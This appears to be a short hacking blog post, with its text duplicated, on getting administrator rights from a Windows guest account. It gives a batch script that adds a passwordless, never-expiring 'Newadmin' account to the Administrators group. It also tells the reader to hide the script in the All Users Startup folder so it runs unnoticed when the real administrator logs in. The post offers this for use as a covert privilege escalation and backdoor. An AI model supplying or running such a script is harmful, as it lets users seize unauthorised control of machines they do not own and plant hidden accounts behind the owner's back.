Hello Friend's,
I am back
How to create an Admin account From a Guest Account intresting right..?
Creating an administrator account from guest account is very easy and simple.
You just need to use your guest account and create one administrator account instantly.
1). Open Notepad, paste the following :
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
2). Save it as a .bat file.
3). Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup
Now when your admin logs into the system, the new account will be automatically created without knowing the admin .Now next time when you will login you will get separate the user account for you.
Thanks you.
feel free to ask and comment
I am back
How to create an Admin account From a Guest Account intresting right..?
Creating an administrator account from guest account is very easy and simple.
You just need to use your guest account and create one administrator account instantly.
1). Open Notepad, paste the following :
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
2). Save it as a .bat file.
3). Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup
Now when your admin logs into the system, the new account will be automatically created without knowing the admin .Now next time when you will login you will get separate the user account for you.
Thanks you.
feel free to ask and comment
Comments
Post a Comment